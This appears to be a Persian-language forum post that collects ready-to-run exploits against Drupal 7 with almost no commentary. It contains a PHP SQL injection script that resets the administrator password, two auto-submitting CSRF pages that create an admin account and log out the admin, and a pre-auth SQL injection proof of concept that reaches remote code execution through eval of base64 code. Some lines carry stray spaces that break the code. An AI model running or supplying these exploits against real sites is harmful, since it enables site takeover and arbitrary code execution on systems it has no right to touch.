توییت
کد:
Drupal core 7.x - SQL Injection
<?php
$url = 'http://www.example.com';
$post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F .0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id= user_login_block&op=Log+in";
$params = array(
'http' => array(
'method' => 'POST',
'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
'content' => $post_data
)
);
$ctx = stream_context_create($params);
$data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
echo "Success! Log in with username \"admin\" and password \"admin\" at {$url}user/login";
} else {
echo "the website isn't vulnerable";
}
?>
[/php]
کد:
Csrf Drupal 7.12 Exploit (Add Administrator)
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit change user to admin</H2>
<form method="POST" name="form0" action="http://<drupal_ip>:80/drupal/admin/people/create?render=overlay&render=overlay">
<input type="hidden" name="name" value="new_admin"/>
<input type="hidden" name="mail" value="new_admin@new_admin.com"/>
<input type="hidden" name="pass[pass1]" value="new_password"/>
<input type="hidden" name="pass[pass2]" value="new_password"/>
<input type="hidden" name="status" value="1"/>
<input type="hidden" name="roles[3]" value="3"/>
<input type="hidden" name="timezone" value="Europe/Prague"/>
<input type="hidden" name="form_build_id" value="form-oUkbOYDjyZag-LhYFHvlPXM1rJzOHCjlHojoh_hS3pY"/>
<input type="hidden" name="form_token" value="cU7nmlpWu-a4UKGFDBcVjEutgvoEidfK1Zgw0HFAtXc"/>
<input type="hidden" name="form_id" value="user_register_form"/>
<input type="hidden" name="op" value="Create new account"/>
</form>
</body>
</html>
[/php]
کد:
Csrf Drupal 7.12 Exploit (Force logout)
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to logout Admin</H2>
<form method="POST" name="form0" action="http://<drupal_ip>:80/drupal/user/logout">
</form>
</body>
</html>
[/php]
کد:
Poc for Drupal Pre Auth SQL Injection
<?php
// _____ __ __ _ _______
// / ___/___ / /__/ /_(_)___ ____ / ____(_)___ _____
// \__ \/ _ \/ //_/ __/ / __ \/ __ \/ __/ / / __ \/ ___/
// ___/ / __/ ,< / /_/ / /_/ / / / / /___/ / / / (__ )
// /____/\___/_/|_|\__/_/\____/_/ /_/_____/_/_/ /_/____/
// Poc for Drupal Pre Auth SQL Injection - (c) 2014 SektionEins
//
// created by Stefan Horst <[email protected]>
// and Stefan Esser <[email protected]>
//·
include 'common.inc';
include 'password.inc';
// set values
$user_id = 0;
$user_name = '';
$code_inject = 'phpinfo();session_destroy();die("");';
$url = isset($argv[1])?$argv[1]:'';
$code = isset($argv[2])?$argv[2]:'';
if ($url == '-h') {
echo "usage:\n";
echo $argv[0].' $url [$code|$file]'."\n";
die();
}
if (empty($url) || strpos($url,'https') === False) {
echo "please state the cookie url. It works only with https urls.\n";
die();
}
if (!empty($code)) {
if (is_file($code)) {
$code_inject = str_replace('<'.'?','',str_replace('<'.'?php','',s tr_replace('?'.'>','',file_get_contents($code))));
} else {
$code_inject = $code;
}
}
$code_inject = rtrim($code_inject,';');
$code_inject .= ';session_destroy();die("");';
if (strpos($url, 'www.') === 0) {
$url = substr($url, 4);
}
$_SESSION= array('a'=>'eval(base64_decode("'.base64_encode($c ode_inject).'"))','build_info' => array(), 'wrapper_callback' => 'form_execute_handlers', '#Array' => array('array_filter'), 'string' => 'assert');
$_SESSION['build_info']['args'][0] = &$_SESSION['string'];
list( , $session_name) = explode('://', $url, 2);
// use insecure cookie with sql inj.
$cookieName = 'SESS' . substr(hash('sha256', $session_name), 0, 32);
$password = user_hash_password('test');
$session_id = drupal_random_key();
$sec_ssid = drupal_random_key();
$serial = str_replace('}','CURLYCLOSE',str_replace('{','CURL YOPEN',"batch_form_state|".serialize($_SESSION)));
$inject = "UNION SELECT $user_id,'$user_name','$password','','','',null,0, 0,0,1,null,'',0,'',null,$user_id,'$session_id','', '127.0.0.1',0,0,REPLACE(REPLACE('".$serial."','CUR LYCLOSE',CHAR(".ord('}').")),'CURLYOPEN',CHAR(".or d('{').")) -- ";
$cookie = $cookieName.'[test+'.urlencode($inject).']='.$session_id.'; '.$cookieName.'[test]='.$session_id.'; S'.$cookieName.'='.$sec_ssid;
$ch = curl_init($url);
curl_setopt($ch,CURLOPT_HEADER,True);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,True);
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,False);
curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:34.0) Gecko/20100101 Firefox/34.0');
curl_setopt($ch,CURLOPT_HTTPHEADER,array(
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language: en-US,en;q=0.5'
));
curl_setopt($ch,CURLOPT_COOKIE,$cookie);
$output = curl_exec($ch);
curl_close($ch);
echo $output;
[/php]
[/align]
نظر